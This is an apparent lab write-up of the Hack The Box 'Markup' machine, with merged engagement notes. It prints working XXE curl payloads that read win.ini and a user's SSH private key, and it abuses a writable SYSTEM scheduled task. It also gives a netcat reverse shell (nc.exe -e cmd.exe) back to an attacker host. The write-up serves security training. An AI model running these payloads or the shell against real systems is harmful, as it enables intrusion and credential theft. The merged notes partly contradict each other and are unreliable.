Markup

Technical Walkthrough

Markup — Walkthrough

Machine Info

• Name: Markup
• OS: Windows
• Difficulty: Easy
• IP: <TARGET>
• Key Themes: XXE, SSH key exfiltration, insecure file permissions, scheduled task abuse

Phase 1: Recon

Ports 22 (SSH), 80 (HTTP), 443 (HTTPS) open. Apache 2.4.41 Win64, PHP 7.2.28, OpenSSH for Windows 8.1.

Phase 2: Web Login

The root page (/) serves a login form (POST to same page). Default credentials admin:password work — 302 redirect to home.php.

curl -v -c cookies.txt -d 'username=admin&password: <redacted>' -L http://<TARGET>/

Phase 3: XXE Exploitation

The Order page (/services.php) contains an HTML comment: Modified by Daniel : UI-Fix-9092. The form sends XML to process.php with Content-Type: text/xml.

Validate XXE with win.ini:

curl -s -b cookies.txt -X POST -H 'Content-Type: text/xml' \
  -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><order><quantity>1</quantity><item>&xxe;</item><address>test</address></order>' \
  http://<TARGET>/process.php

Response contains win.ini contents — XXE confirmed.

Extract Daniel's SSH key:

curl -s -b cookies.txt -X POST -H 'Content-Type: text/xml' \
  -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///c:/users/daniel/.ssh/id_rsa">]><order><quantity>1</quantity><item>&xxe;</item><address>test</address></order>' \
  http://<TARGET>/process.php

Full OpenSSH private key returned in response body.

Phase 4: SSH as Daniel (User Flag)

Save the key, set permissions, SSH in:

chmod 600 daniel_id_rsa
ssh -i daniel_id_rsa daniel@<TARGET>
type C:\Users\daniel\Desktop\user.txt

User flag: <hash redacted>

Revalidated on 2026-05-06 AEST against live <TARGET>; normalized output saved to loot/user.txt, with raw command output in loot/user-20260506.txt and verification in enum/user-flag-verify-20260506.txt.

Phase 5: Privilege Escalation

Check C:\Log-Management\job.bat permissions:

icacls C:\Log-Management\job.bat

Output: BUILTIN\Users:(F) — any user has full control.

The file is executed periodically by a SYSTEM-level scheduled task. Overwrite it to copy the root flag:

echo copy C:\Users\Administrator\Desktop\root.txt C:\Log-Management\root.txt > C:\Log-Management\job.bat

Wait for the scheduled task to execute (runs every ~1 minute). Then read the copied flag:

type C:\Log-Management\root.txt

Root flag: <hash redacted>

Alternative Privesc (Reverse Shell)

Instead of copying the flag, you can get a full Administrator shell:

1. Upload nc.exe via SCP: scp -i daniel_id_rsa nc.exe daniel@target:'C:/Log-Management/nc.exe'
2. Start listener: nc -lvnp 4444
3. Overwrite job.bat: echo C:\Log-Management\nc.exe -e cmd.exe <secret redacted> 4444 > C:\Log-Management\job.bat
4. Wait for SYSTEM shell callback

Note: job.bat may be reverted frequently — be prepared to re-overwrite.

Lessons Learned

1. Default credentials are always worth checking first
2. XXE is powerful for file exfiltration on Windows — SSH keys, web.config, SAM hive (if readable)
3. HTML source comments can reveal usernames
4. Writable scheduled task scripts are a common Windows privesc vector
5. SCP through SSH is a reliable file transfer method when HTTP staging fails
6. For HTB machines, copying the flag via job.bat is cleaner than waiting for a reverse shell if the task resets frequently

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

• Target IP: <TARGET>
• Attacker IP: <TARGET>
• Pwnbox SSH: profex0r@<TARGET>
• OS: Windows (Apache 2.4.41 Win64, OpenSSH 8.1, PHP 7.2.28)
• Difficulty: Easy
• Date: 2026-05-05

Confirmed Ports (from user nmap)

Evidence Ledger

Flags

• User: <hash redacted> (C:\Users\daniel\Desktop\user.txt)
• Root: <hash redacted> (C:\Users\Administrator\Desktop\root.txt)

Key Findings

1. Default credentials admin:password on web login
2. XXE vulnerability in order XML processing (process.php)
3. Source comment discloses username "Daniel"
4. Daniel's SSH private key readable via XXE at file:///c:/users/daniel/.ssh/id_rsa
5. Insecure ACL on C:\Log-Management\job.bat — BUILTIN\Users:(F)
6. Scheduled task runs job.bat as SYSTEM — abused to copy Admin flag

Attack Chain

Web Login (admin:password)
  -> XXE (file read via process.php)
    -> SSH Key Exfil (daniel's id_rsa)
      -> SSH as daniel (user flag)
        -> Writable job.bat (BUILTIN\Users:F)
          -> Scheduled task executes as SYSTEM
            -> Root flag copied to readable location

Notes

Scope

• Target: Markup
• Difficulty: Easy / Starting Point
• OS: Windows
• IP: <TARGET> (previously <TARGET>)
• Local workspace: <local workspace><TARGET>-Markup

Engagement Details

• Pwnbox: <<secret redacted>>@<TARGET> (VPN IP: <TARGET>)
• VPN: Connected, tun0 up with <TARGET>
• Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Status

BLOCKED: Target <TARGET> is not reachable. Gateway returns "Host Unreachable." Machine needs to be spawned via HTB platform.

Root flag: <REDACTED>, saved to loot/root.txt)

User flag: <REDACTED>

Attack Chain (Ready to Execute When Machine is Up)

1. nmap -sC -sV -Pn <TARGET> -- expect 22, 80, 443
2. Web login at port 80: <REDACTED>
3. Find order form, submit XXE payload to read win.ini (validate)
4. XXE read daniel's SSH key: file:///c:/users/daniel/.ssh/id_rsa
5. SSH as daniel, get user.txt from C:\Users\daniel\Desktop\user.txt
6. Check C:\Log-Management\job.bat ACLs -- BUILTIN\Users:(F)
7. Upload nc.exe via certutil, overwrite job.bat, catch reverse shell on 4444
8. Get root.txt from C:\Users\Administrator\Desktop\root.txt

Notes

Scope

• Target IP: <TARGET>
• Attacker IP: <TARGET>
• Pwnbox SSH: <<secret redacted>>@<TARGET>
• OS: Windows (Apache 2.4.41 Win64, OpenSSH 8.1, PHP 7.2.28)
• Difficulty: Easy
• Date: 2026-05-05

Confirmed Ports (from user nmap)

Evidence Ledger

Flags

• User: <<secret redacted>> (C:\Users\daniel\Desktop\user.txt)
• Root: <<secret redacted>> (C:\Users\Administrator\Desktop\root.txt)

Key Findings

1. Default credentials `admin: <REDACTED>
2. XXE vulnerability in order XML processing (process.php)
3. Source comment discloses username "Daniel"
4. Daniel's SSH private key readable via XXE at file:///c:/users/daniel/.ssh/id_rsa
5. Insecure ACL on C:\Log-Management\job.bat — BUILTIN\Users:(F)
6. Scheduled task runs job.bat as SYSTEM — abused to copy Admin flag

Attack Chain

Web Login (admin: <REDACTED>
  -> XXE (file read via process.php)
    -> SSH Key Exfil (daniel's id_rsa)
      -> SSH as daniel (user flag)
        -> Writable job.bat (BUILTIN\Users:F)
          -> Scheduled task executes as SYSTEM
            -> Root flag copied to readable location

Notes

Scope

• Target: Markup
• Difficulty: Easy / Very Easy
• OS: Windows
• Current known IP: <TARGET>
• Local workspace: <local workspace><TARGET>-Markup

Evidence Rule

Public research in research.md is advisory only. Record only live target evidence in this file.

Engagement Details

• Pwnbox: <<secret redacted>>@<TARGET> (VPN IP: <TARGET>)
• VPN: edge-au-dedivip-1.hackthebox.eu:1337 (connected, tun0 up)
• Difficulty Mode: Easy (timebox 20 min per vector, target solve 45-60 min)

Evidence Ledger

Status

BLOCKED: Target machine <TARGET> is currently despawned/offline. VPN tunnel is healthy (tun0: <TARGET>, route to <TARGET>/16 via tun0), but all ports return "filtered" and curl returns "No route to host."

Root flag: <REDACTED>

User flag: <REDACTED>

Next Steps (When Machine is Respawned)

1. Run nmap: nmap -sC -sV -Pn -oN nmap/initial <TARGET>
2. Verify HTTP on port 80, try `admin: <REDACTED>
3. Find XML order form, confirm XXE with win.ini read
4. Read daniel's SSH key via XXE
5. SSH as daniel, grab user.txt
6. Verify job.bat ACL, upload nc.exe, overwrite job.bat, catch shell as SYSTEM
7. Grab root.txt (verify matches saved flag)